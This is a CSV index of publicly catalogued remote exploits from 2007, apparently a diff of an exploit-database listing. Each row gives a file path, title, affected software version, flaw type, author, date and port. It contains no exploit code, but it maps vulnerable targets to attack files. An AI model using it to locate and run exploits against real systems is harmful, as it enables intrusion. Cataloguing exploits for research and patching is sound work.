+3099,exploits/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String (Metasploit)",2007-01-08,Enseirb,remote,linux,2947 +3107,exploits/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (Metasploit)",2007-01-09,"Jacopo Cervini",remote,windows,21 +40404,exploits/php/remote/40404.rb,"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)",2016-09-21,"Mehmet Ince",remote,php,80 +3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",remote,windows,69 +3133,exploits/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",remote,windows,143 +3137,exploits/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)",2007-01-16,LifeAsaGeek,remote,windows, +3140,exploits/windows/remote/3140.pl,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow",2007-01-17,UmZ,remote,windows,21 +3148,exploits/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute (MS07-004)",2007-01-17,pang0,remote,windows, +3158,exploits/windows/remote/3158.c,"Intel Centrino ipw2200BG - Wireless Driver Remote Overflow (PoC)",2007-01-19,oveRet,remote,windows, +3168,exploits/windows/remote/3168.java,"Sun Microsystems Java - '.GIF' File Parsing Memory Corruption",2007-01-21,luoluo,remote,windows, +3170,exploits/windows/remote/3170.pm,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,remote,windows,69 +3189,exploits/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management",2007-01-24,"Adrian _pagvac_ Pastor",remote,hardware, +3211,exploits/windows/remote/3211.py,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)",2007-01-27,"Winny Thomas",remote,windows,6503 +3218,exploits/windows/remote/3218.pl,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",remote,windows,6503 +3244,exploits/windows/remote/3244.py,"CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow",2007-02-01,"Winny Thomas",remote,windows,1900 +3264,exploits/windows/remote/3264.pl,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",remote,windows,25 +3265,exploits/windows/remote/3265.pm,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",remote,windows,25 +3269,exploits/multiple/remote/3269.pl,"Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection",2007-02-05,bunker,remote,multiple, +3274,exploits/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution",2007-02-06,"Marco Ivaldi",remote,windows,3306 +3279,exploits/windows/remote/3279.html,"Alibaba Alipay - Remove ActiveX Remote Code Execution",2007-02-06,cocoruder,remote,windows, +3291,exploits/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,remote,windows, +3293,exploits/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass",2007-02-11,kingcope,remote,solaris,23 +3294,exploits/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",remote,hardware,80 +3296,exploits/windows/remote/3296.c,"uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow",2007-02-12,defsec,remote,windows, +3302,exploits/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper",2007-02-13,"Marco Ivaldi",remote,windows,80 +3303,exploits/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack",2007-02-13,"Marco Ivaldi",remote,multiple, +3319,exploits/windows/remote/3319.pl,"MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,remote,windows,143 +3320,exploits/windows/remote/3320.pl,"MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow",2007-02-16,mu-b,remote,windows,143 +3329,exploits/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - 'pop3' Remote Format String",2007-02-18,fuGich,remote,linux,110 +3335,exploits/windows/remote/3335.pm,"Ipswitch WS_FTP Server 5.05 - XMD5 Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",remote,windows,21 +3340,exploits/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - 'location.hostname' Cross-Domain",2007-02-20,"Michal Zalewski",remote,windows, +3358,exploits/multiple/remote/3358.pl,"Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission",2007-02-22,bunker,remote,multiple, +3359,exploits/multiple/remote/3359.pl,"Oracle 10g - KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission",2007-02-22,bunker,remote,multiple, +3363,exploits/multiple/remote/3363.pl,"Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection",2007-02-23,bunker,remote,multiple, +3364,exploits/windows/remote/3364.pl,"Oracle 9i/10g - ACTIVATE_SUBSCRIPTION SQL Injection",2007-02-23,bunker,remote,windows, +3375,exploits/multiple/remote/3375.pl,"Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)",2007-02-26,bunker,remote,multiple, +3376,exploits/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection (2)",2007-02-26,bunker,remote,multiple, +3377,exploits/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL - SQL Injection (2)",2007-02-26,bunker,remote,multiple, +3378,exploits/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,remote,multiple, +3380,exploits/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",remote,windows, +3381,exploits/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging",2007-02-27,"Craig Heffner",remote,windows, +3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)",2007-02-28,"Umesh Wanve",remote,windows,69 +3389,exploits/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",remote,linux, +3391,exploits/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",remote,windows, +3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow (PoC)",2007-03-01,cybermind,remote,windows, +3397,exploits/windows/remote/3397.pl,"MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow",2007-03-02,mu-b,remote,windows,143 +3405,exploits/multiple/remote/3405.txt,"PHP 4.4.3 < 4.4.6 - 'PHPinfo()' Cross-Site Scripting",2007-03-04,"Stefan Esser",remote,multiple, +3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,remote,windows, +3422,exploits/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",remote,windows, +3425,exploits/multiple/remote/3425.txt,"mod_security 2.1.0 - ASCIIZ byte POST Rules Bypass",2007-03-07,"Stefan Esser",remote,multiple, +3452,exploits/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass",2007-03-10,"Stefan Esser",remote,multiple, +3462,exploits/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,remote,windows, +3463,exploits/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,remote,windows, +3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",remote,windows,21 +3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",remote,windows,21 +3491,exploits/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution (PoC)",2007-03-15,"Core Security",remote,bsd, +3495,exploits/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",remote,windows,6503 +3531,exploits/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",remote,windows,554 +3537,exploits/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow",2007-03-21,"Winny Thomas",remote,windows,143 +3540,exploits/windows/remote/3540.py,"Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)",2007-03-21,muts,remote,windows,143 +3541,exploits/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",remote,windows,69 +3544,exploits/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Update/Change",2007-03-22,"Andres Tarasco",remote,windows, +3554,exploits/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",remote,linux,53 +3555,exploits/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage",2007-03-23,"Jon Hart",remote,multiple, +3561,exploits/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",remote,windows,143 +3570,exploits/windows/remote/3570.c,"WarFTP 1.65 - 'USER' Remote Buffer Overflow",2007-03-25,niXel,remote,windows,21 +3575,exploits/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,remote,windows, +3577,exploits/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory (MS07-009)",2007-03-26,anonymous,remote,windows, +3579,exploits/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow",2007-03-26,"Winny Thomas",remote,windows,21 +3584,exploits/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,remote,multiple, +3585,exploits/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,remote,multiple, +3589,exploits/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,remote,windows,80 +3604,exploits/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Remote Code",2007-03-29,Shirkdog,remote,windows,111 +3609,exploits/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",remote,linux, +3610,exploits/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",remote,windows, +3615,exploits/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Remote Buffer Overflow",2007-03-30,mu-b,remote,lin_x86,53 +3616,exploits/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Overflow",2007-03-31,muts,remote,windows,143 +3627,exploits/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,remote,windows,143 +3634,exploits/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,remote,windows, +3635,exploits/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",remote,windows, +3636,exploits/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)",2007-04-01,jamikazu,remote,windows, +3650,exploits/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,remote,windows, +3651,exploits/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Generator",2007-04-03,"YAG KOHHA",remote,windows, +3654,exploits/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution",2007-04-03,"Isma Khan",remote,multiple, +3661,exploits/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,remote,windows, +3662,exploits/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",remote,windows, +3675,exploits/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",remote,windows,21 +3680,exploits/win_x86/remote/3680.sh,"Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,remote,win_x86,80 +3698,exploits/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,remote,linux, +3708,exploits/multiple/remote/3708.html,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,remote,multiple, +3724,exploits/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",remote,linux, +3728,exploits/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,remote,windows, +3737,exploits/windows/remote/3737.py,"Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",remote,windows,139 +3738,exploits/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - 'mssql_connect()' Remote Buffer Overflow",2007-04-15,rgod,remote,windows,80 +3740,exploits/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,remote,windows,139 +3746,exploits/windows/remote/3746.txt,"Microsoft Windows - DNS RPC Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",remote,windows,445 +3787,exploits/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - exec-shield Remote Format String",2007-04-24,Xpl017Elz,remote,linux,143 +3804,exploits/windows/remote/3804.txt,"Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)",2007-04-26,"Lionel d'Hauenens",remote,windows, +3808,exploits/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,remote,windows, +3810,exploits/windows/remote/3810.html,"IPIX Image Well - ActiveX 'iPIX-ImageWell-ipix.dll' Remote Buffer Overflow",2007-04-27,"Umesh Wanve",remote,windows, +3815,exploits/linux/remote/3815.c,"Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow",2007-04-29,Xpl017Elz,remote,linux, +3821,exploits/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,remote,linux, +3822,exploits/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,remote,win_x86, +3829,exploits/linux/remote/3829.c,"3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow",2007-05-02,Xpl017Elz,remote,linux, +3844,exploits/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow",2007-05-04,shinnai,remote,windows, +3872,exploits/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",remote,windows, +3877,exploits/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",remote,windows, +3880,exploits/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",remote,windows, +3881,exploits/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",remote,windows, +3882,exploits/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",remote,windows, +3892,exploits/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)",2007-05-10,"Andres Tarasco",remote,windows, +3893,exploits/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,remote,windows, +3899,exploits/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,remote,windows, +3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080 +3916,exploits/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,remote,windows, +3922,exploits/linux/remote/3922.c,"webdesproxy 0.0.1 - 'exec-shield' GET Remote Code Execution",2007-05-14,Xpl017Elz,remote,linux,8080 +3925,exploits/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",remote,windows,113 +3927,exploits/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,remote,windows, +3934,exploits/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,remote,windows, +3938,exploits/windows/remote/3938.html,"PrecisionID Barcode ActiveX 1.9 - Arbitrary File Overwrite",2007-05-16,shinnai,remote,windows, +3950,exploits/windows/remote/3950.html,"LeadTools JPEG 2000 - COM Object Remote Stack Overflow",2007-05-18,shinnai,remote,windows, +3951,exploits/windows/remote/3951.html,"LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow",2007-05-18,shinnai,remote,windows, +3952,exploits/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow",2007-05-18,shinnai,remote,windows, +3954,exploits/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Authentication Bypass",2007-05-19,"Ahmed Siddiqui",remote,windows,69 +3961,exploits/windows/remote/3961.html,"LeadTools Raster Variant - 'LTRVR14e.dll' Remote File Overwrite",2007-05-21,shinnai,remote,windows, +3966,exploits/windows/remote/3966.php,"Pegasus ImagN - ActiveX Control Remote Buffer Overflow",2007-05-21,rgod,remote,windows, +3967,exploits/windows/remote/3967.html,"Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution",2007-05-21,rgod,remote,windows, +3968,exploits/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow",2007-05-22,"KIM Kee-hong",remote,windows, +3982,exploits/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,remote,windows, +3984,exploits/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,remote,windows, +3993,exploits/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,remote,windows, +3996,exploits/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,remote,windows,80 +4008,exploits/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,remote,windows, +4010,exploits/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method",2007-05-30,shinnai,remote,windows, +4014,exploits/windows/remote/4014.py,"Eudora 7.1.0.9 - IMAP FLAGS Remote Overwrite (SEH)",2007-05-30,h07,remote,windows, +4015,exploits/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Overflow",2007-05-31,rgod,remote,windows, +4016,exploits/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,remote,windows, +4021,exploits/windows/remote/4021.html,"Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,remote,windows, +4023,exploits/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow",2007-06-02,rgod,remote,windows, +4027,exploits/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Overflow (Egghunter)",2007-06-03,muts,remote,windows,8080 +4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64, +4042,exploits/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,remote,windows, +4043,exploits/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)",2007-06-07,Excepti0n,remote,windows, +4045,exploits/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",remote,windows, +4049,exploits/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods",2007-06-08,shinnai,remote,windows, +4050,exploits/windows/remote/4050.html,"Zenturi ProgramChecker - 'ActiveX NavigateUrl()' Insecure Method",2007-06-08,shinnai,remote,windows, +4052,exploits/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute",2007-06-08,Excepti0n,remote,windows, +4053,exploits/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute",2007-06-08,Excepti0n,remote,windows, +4060,exploits/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite",2007-06-12,shinnai,remote,windows, +4061,exploits/windows/remote/4061.html,"Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)",2007-06-12,"Thor Larholm",remote,windows, +4065,exploits/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,remote,windows, +4066,exploits/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,remote,windows, +4087,exploits/linux/remote/4087.c,"BitchX 1.1-final - 'EXEC' Remote Command Execution",2007-06-21,clarity_,remote,linux, +4093,exploits/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,remote,multiple,80 +4094,exploits/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,remote,windows, +4101,exploits/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - File Write",2007-06-25,shinnai,remote,windows, +4109,exploits/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()'/ Insecure Method",2007-06-26,shinnai,remote,windows, +4110,exploits/windows/remote/4110.html,"Avax Vector 'Avaxswf.dll' 1.0.0.1 - ActiveX Arbitrary Data Write",2007-06-26,callAX,remote,windows, +4119,exploits/windows/remote/4119.html,"HP Digital Imaging 'hpqxml.dll 2.0.0.133' - Arbitrary Data Write",2007-06-27,callAX,remote,windows, +4123,exploits/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - 'AmxVnc.dll 1.0.13.0' Remote Buffer Overflow",2007-06-28,rgod,remote,windows, +4143,exploits/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - Remote Buffer Overflow",2007-07-03,shinnai,remote,windows, +4146,exploits/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 < 9.2sp1 - Remote Buffer Overflow",2007-07-03,Heretic2,remote,windows,5151 +4152,exploits/windows/remote/4152.py,"ViRC 2.0 - JOIN Response Remote Overwrite (SEH)",2007-07-06,h07,remote,windows, +4155,exploits/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' File Write",2007-07-06,shinnai,remote,windows, +4157,exploits/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,remote,windows,9999 +4158,exploits/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow",2007-07-07,nitr0us,remote,windows, +4160,exploits/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,remote,windows, +4162,exploits/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Overflow",2007-07-08,Xpl017Elz,remote,linux,80 +4170,exploits/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray",2007-07-10,callAX,remote,windows, +4176,exploits/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write",2007-07-12,callAX,remote,windows, +4177,exploits/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray",2007-07-12,callAX,remote,windows, +4188,exploits/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC)",2007-07-16,yunshu,remote,windows, +4190,exploits/windows/remote/4190.html,"Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods",2007-07-17,shinnai,remote,windows, +4200,exploits/windows/remote/4200.html,"Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow",2007-07-19,shinnai,remote,windows, +4207,exploits/windows/remote/4207.py,"Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow",2007-07-20,"dmc & prdelka",remote,windows,143 +4208,exploits/windows/remote/4208.html,"Data Dynamics ActiveReport - ActiveX 'actrpt2.dll 2.5' Insecure Method",2007-07-21,shinnai,remote,windows, +4214,exploits/windows/remote/4214.html,"Zenturi NixonMyPrograms Class 'sasatl.dll 1.5.0.531' - Remote Buffer Overflow",2007-07-23,shinnai,remote,windows, +4217,exploits/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow",2007-07-24,"Jared DeMott",remote,windows, +4222,exploits/windows/remote/4222.c,"Microsoft Windows RSH daemon 1.7 - Remote Buffer Overflow",2007-07-24,"Joey Mengele",remote,windows,514 +4223,exploits/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow",2007-07-25,ZhenHan.Liu,remote,windows,143 +4226,exploits/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,remote,windows, +4228,exploits/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,remote,windows,143 +4230,exploits/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File",2007-07-26,h07,remote,windows, +4234,exploits/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server - Data Write/Code Execution",2007-07-27,callAX,remote,windows, +4237,exploits/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution",2007-07-27,h07,remote,windows, +4240,exploits/windows/remote/4240.html,"VMware 'IntraProcessLogging.dll' 5.5.3.42958 - Arbitrary Data Write",2007-07-28,callAX,remote,windows, +4243,exploits/linux/remote/4243.c,"CoreHTTP 0.5.3alpha - HTTPd Remote Buffer Overflow",2007-07-29,vade79,remote,linux,80 +4244,exploits/windows/remote/4244.html,"VMware Inc 6.0.0 - 'vielib.dll 2.2.5.42958' Remode Code Execution",2007-07-29,callAX,remote,windows, +4245,exploits/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution",2007-07-30,callAX,remote,windows, +4247,exploits/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow",2007-07-30,BackBone,remote,windows,3050 +4250,exploits/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - 'GetComponentVersion()' Remote Overflow",2007-07-31,lhoang8500,remote,windows, +4255,exploits/windows/remote/4255.html,"CHILKAT ASP String - 'CkString.dll 1.1 SaveToFile()' Insecure Method",2007-08-05,shinnai,remote,windows, +4259,exploits/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Remote Stack Overflow",2007-08-06,DeltahackingTEAM,remote,windows, +4266,exploits/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning",2007-08-07,posedge,remote,multiple, +4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,remote,windows, 